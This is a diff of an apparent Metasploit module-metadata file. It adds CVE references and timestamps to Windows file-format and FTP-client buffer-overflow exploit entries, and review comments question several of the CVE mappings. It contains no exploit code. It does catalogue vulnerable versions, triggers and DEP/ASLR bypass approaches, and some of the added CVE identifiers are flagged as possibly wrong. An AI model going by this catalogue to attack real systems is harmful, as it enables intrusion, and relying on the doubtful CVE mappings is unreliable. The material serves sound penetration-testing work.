"path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ispvm_xcf_ispxcf",
@@ -161037,6 +162268,7 @@
],
"description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n might require up to several seconds to receive a shell.",
"references": [
"CVE-2011-10021",
"OSVDB-72063",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002"
],
@@ -161048,7 +162280,7 @@
"targets": [
"Windows Universal DEP & ASLR Bypass"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/magix_musikmaker_16_mmm",
@@ -161357,6 +162589,7 @@
],
"description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.",
"references": [
"CVE-2009-20002",
"OSVDB-56574",
"EDB-9618",
"EDB-10240"
@@ -161369,7 +162602,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -161451,6 +162684,7 @@
],
"description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"CVE-2011-10024",
"OSVDB-72101",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004"
],
@@ -161462,7 +162696,7 @@
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_coreplayer2011_s3m",
@@ -161496,6 +162730,7 @@
],
"description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"CVE-2011-10023",
"OSVDB-72102",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003"
],
@@ -161507,7 +162742,7 @@
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_quickplayer_s3m",
@@ -161586,6 +162821,7 @@
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.",
"references": [
"CVE-2011-10008",
"BID-46926",
"EDB-17013",
"URL-http://www.mplayer-ww.com/eng/"
@@ -161598,7 +162834,7 @@
"targets": [
"Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_m3u_bof",
@@ -161632,6 +162868,7 @@
],
"description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.",
"references": [
"CVE-2011-3625",
"BID-49149",
"OSVDB-74604",
"URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf"
@@ -161644,7 +162881,7 @@
"targets": [
"SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -162564,6 +163801,7 @@
],
"description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2010-20123",
"OSVDB-64580",
"EDB-11791"
],
@@ -162577,7 +163815,7 @@
"Windows Universal (SEH)",
"Windows XP SP3 French"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mymp3player_m3u",
@@ -162610,6 +163848,7 @@
],
"description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.",
"references": [
"CVE-2011-10012",
"OSVDB-72291",
"EDB-17223"
],
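Review bot: the description reads "specially crafted string longer then 520 characters"; it should be "longer than". The text here mirrors the module's description, so the fix belongs in /modules/exploits/windows/fileformat/netop.rb. The same kind of slip appears in the aol_desktop_linktag ("results arbitrary code execution"), aviosoft_plf_buf ("may result arbitrary code execution") and subtitle_processor_m3u_bof ("This results a buffer overflow") descriptions.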
@@ -162621,7 +163860,7 @@
"targets": [
"Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/netop.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/netop",
@@ -163258,6 +164497,7 @@
],
"description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2012-10051",
"OSVDB-83745",
"EDB-19563",
"EDB-20036",
@@ -163271,7 +164511,7 @@
"targets": [
"Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/proshow_load_bof",
@@ -163351,6 +164591,7 @@
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"CVE-2011-10016",
"OSVDB-83436",
"EDB-16083",
"BID-46059",
@@ -163365,7 +164606,7 @@
"Windows XP SP3",
"Windows 7/Windows Vista"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/real_networks_netzip_bof",
@@ -163679,6 +164920,7 @@
],
"description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.",
"references": [
"CVE-2025-34106",
"EDB-37760"
],
"platform": "Windows",
@@ -163689,7 +164931,7 @@
"targets": [
"<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/shaper_pdf_bof",
@@ -163723,6 +164965,7 @@
],
"description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2012-10053",
"OSVDB-64368",
"EDB-11219"
],
@@ -163734,7 +164977,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/somplplayer_m3u",
@@ -163768,6 +165011,7 @@
],
"description": "This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.",
"references": [
"CVE-2011-10025",
"OSVDB-72050",
"EDB-17217",
"URL-http://sourceforge.net/projects/subtitleproc/"
@@ -163780,7 +165024,7 @@
"targets": [
"Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/subtitle_processor_m3u_bof",
@@ -163957,6 +165201,7 @@
],
"description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. \"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.",
"references": [
"CVE-2009-0261",
"OSVDB-100619",
"EDB-29799"
],
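Review bot: The CVE added in this hunk, CVE-2009-0261, predates the hunk's other identifiers (OSVDB-100619, EDB-29799) by several years, and the description says the module was tested on Windows 8; please confirm the CVE record describes the Settings.ini overflow in Total Video Player 1.3.1 rather than an earlier, separately tracked issue, and if it does, add a URL reference that ties the two together so the next reader does not have to repeat the check.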
@@ -163968,7 +165213,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/total_video_player_ini_bof",
@@ -164241,6 +165486,7 @@
],
"description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.",
"references": [
"CVE-2010-20114",
"OSVDB-63067",
"BID-38815",
"EDB-11789"
@@ -164253,7 +165499,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/varicad_dwb",
@@ -164288,6 +165534,7 @@
],
"description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.",
"references": [
"CVE-2025-34123",
"OSVDB-69616",
"EDB-29234"
],
@@ -164299,7 +165546,7 @@
"targets": [
"VideoCharge Studio 2.12.3.685"
],
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/videocharge_studio.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videocharge_studio",
@@ -164754,6 +166001,7 @@
],
"description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.",
"references": [
"CVE-2009-0182",
"OSVDB-64581",
"BID-33960"
],
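Review bot: CVE-2009-0182 is added here without anything confirming it covers the .cue file vector the description names; the hunk otherwise cites only OSVDB-64581 and BID-33960, so please check the CVE text against the .cue trigger before landing, or add a URL reference that does.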
@@ -164765,7 +166013,7 @@
"targets": [
"VUPlayer 2.49"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vuplayer_cue",
@@ -165035,7 +166283,7 @@
"targets": [
"Microsoft Windows 98 or newer"
],
"mod_time": "2025-07-25 18:46:47 +0000",
"mod_time": "2025-09-26 03:06:37 +0000",
"path": "/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/windows_script_host_vbscript",
@@ -165056,6 +166304,49 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/windows_script_host_wsf": {
"name": "Malicious Windows Script Host Script File (.wsf)",
"fullname": "exploit/windows/fileformat/windows_script_host_wsf",
"aliases": [],
"rank": 500,
"disclosure_date": "1998-06-25",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module creates a Windows Script Host (WSH) Windows Script File (.wsf).",
"references": [
"ATT&CK-T1204.002"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Microsoft Windows 98 or newer"
],
"mod_time": "2025-10-05 20:16:00 +0000",
"path": "/modules/exploits/windows/fileformat/windows_script_host_wsf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/windows_script_host_wsf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"screen-effects"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/winrar_ace": {
"name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
"fullname": "exploit/windows/fileformat/winrar_ace",
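Review bot: The references array for the new windows_script_host_wsf entry holds only "ATT&CK-T1204.002", so nothing in the metadata supports the 1998-06-25 disclosure_date or the "Microsoft Windows 98 or newer" target string; add a URL reference documenting when Windows Script Host gained .wsf support, since the neighbouring windows_script_host_vbscript entry uses the same target string and reviewers will expect the two to be justified the same way.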
@@ -165164,6 +166455,7 @@
],
"description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014",
"references": [
"CVE-2014-125119",
"OSVDB-62610",
"BID-66383",
"URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html",
@@ -165177,7 +166469,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_name_spoofing",
@@ -165308,6 +166600,7 @@
],
"description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2010-10017",
"OSVDB-66911",
"EDB-14497"
],
@@ -165319,7 +166612,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -165462,6 +166755,7 @@
],
"description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.",
"references": [
"CVE-2009-20003",
"OSVDB-57162",
"EDB-10371"
],
@@ -165473,7 +166767,7 @@
"targets": [
"Windows XP SP2 / SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -165510,6 +166804,7 @@
],
"description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. This results in overwriting a\n structured exception handler record.",
"references": [
"CVE-2010-20042",
"OSVDB-66912",
"EDB-14517",
"EDB-14633",
@@ -165523,7 +166818,7 @@
"targets": [
"Xion Audio Player v1.0.126 XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xion_m3u_sehbof",
@@ -165808,6 +167103,7 @@
],
"description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.",
"references": [
"CVE-2009-1675",
"OSVDB-68703",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -165819,7 +167115,7 @@
"targets": [
"XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/32bitftp_list_reply",
@@ -165909,6 +167205,7 @@
],
"description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.",
"references": [
"CVE-2019-5619",
"OSVDB-68701",
"EDB-16738",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
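Review bot: CVE-2019-5619 is being attached to a module whose other references (OSVDB-68701, EDB-16738, the 2010 Corelan "death of an FTP client" post) all date from 2010, so the nine-year gap needs explaining: confirm the CVE record actually describes the AASync v2.2.1.0 LIST-reply overflow, and if the id was assigned retroactively, say so in the module documentation so nobody assumes a separate 2019 bug.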
@@ -165921,7 +167218,7 @@
"targets": [
"XP SP3 Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/aasync_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/aasync_list_reply",
@@ -166209,6 +167506,7 @@
],
"description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.",
"references": [
"CVE-2012-10055",
"OSVDB-82798",
"EDB-19024"
],
@@ -166222,7 +167520,7 @@
"Windows XP SP3 - English",
"Windows Server 2003 - English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb",
"is_install_path": true,
"ref_name": "windows/ftp/comsnd_ftpd_fmtstr",
@@ -166353,6 +167651,7 @@
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"CVE-2010-20121",
"OSVDB-62134",
"BID-38262",
"URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/",
@@ -166381,7 +167680,7 @@
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_cwd_fixret",
@@ -166416,6 +167715,7 @@
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.",
"references": [
"CVE-2024-0546",
"OSVDB-62134",
"EDB-14400",
"EDB-14451"
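Review bot: The three EasyFTP entries in this diff all cite OSVDB-62134 yet now receive three different CVEs: CVE-2010-20121 for easyftp_cwd_fixret, CVE-2024-0546 here for easyftp_list_fixret, and CVE-2011-10005 for easyftp_mkd_fixret. This module's own description says it is "likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit". Either the CVEs are distinct and the shared OSVDB id is wrong for at least two modules, or they should share one CVE; please reconcile before landing, and double-check CVE-2024-0546 in particular, since a 2024 id for a 2010 issue is the outlier of the three.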
@@ -166433,7 +167733,7 @@
"targets": [
"Windows XP SP3 - Version 2002"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_list_fixret",
@@ -166467,6 +167767,7 @@
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"CVE-2011-10005",
"OSVDB-62134",
"EDB-12044",
"EDB-14399"
@@ -166493,7 +167794,7 @@
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_mkd_fixret",
@@ -166578,6 +167879,7 @@
],
"description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.",
"references": [
"CVE-2010-20045",
"OSVDB-94555",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -166589,7 +167891,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/filewrangler_list_reply",
@@ -166623,6 +167925,7 @@
],
"description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.",
"references": [
"CVE-2012-10023",
"OSVDB-69621",
"EDB-23243"
],
@@ -166639,7 +167942,7 @@
"targets": [
"FreeFloat / Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_user",
@@ -166673,6 +167976,7 @@
],
"description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.",
"references": [
"CVE-2012-10030",
"OSVDB-88302",
"OSVDB-88303"
],
@@ -166689,7 +167993,7 @@
"targets": [
"FreeFloat"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_wbem",
@@ -166723,6 +168027,7 @@
],
"description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.",
"references": [
"CVE-2013-10042",
"OSVDB-96517",
"EDB-27747",
"BID-61905"
@@ -166740,7 +168045,7 @@
"targets": [
"freeFTPd 1.0.10 and below on Windows Desktop Version"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/freeftpd_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freeftpd_pass",
@@ -166828,6 +168133,7 @@
],
"description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.",
"references": [
"CVE-2019-9760",
"OSVDB-68638",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
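Review bot: CVE-2019-9760 is added to a module that targets FTPGetter Standard v3.55.0.05 and cites only 2010-era references (OSVDB-68638, the Corelan post); please confirm the CVE record names that version and the PWD-response vector, because a later FTPGetter release with a similar overflow would carry a different id and the mapping would then be wrong.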
@@ -166839,7 +168145,7 @@
"targets": [
"XP SP3 Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpgetter_pwd_reply",
@@ -166872,6 +168178,7 @@
],
"description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.",
"references": [
"CVE-2010-20108",
"OSVDB-68714",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -166885,7 +168192,7 @@
"XP SP3 Professional, German - shlwapi 6.00.2900.5912",
"XP SP3 Professional, English - shlwapi 6.00.2900.5512"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftppad_list_reply",
@@ -166918,6 +168225,7 @@
],
"description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. This will overwrite the saved EIP and structured exception handler.",
"references": [
"CVE-2017-6465",
"OSVDB-68639",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
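Review bot: CVE-2017-6465 is attached to a module for FTPShell 5.1 whose other references are OSVDB-68639 and the 2010 Corelan post; confirm the CVE covers version 5.1 and the PWD-response overflow rather than a later FTPShell client version, and add a URL reference for the CVE if it does.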
@@ -166929,7 +168237,7 @@
"targets": [
"Windows XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpshell51_pwd_reply",
@@ -167008,6 +168316,7 @@
],
"description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.",
"references": [
"CVE-2010-20107",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
@@ -167018,7 +168327,7 @@
"targets": [
"XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpsynch_list_reply",
@@ -167052,6 +168361,7 @@
],
"description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.",
"references": [
"CVE-2010-20034",
"OSVDB-68641",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
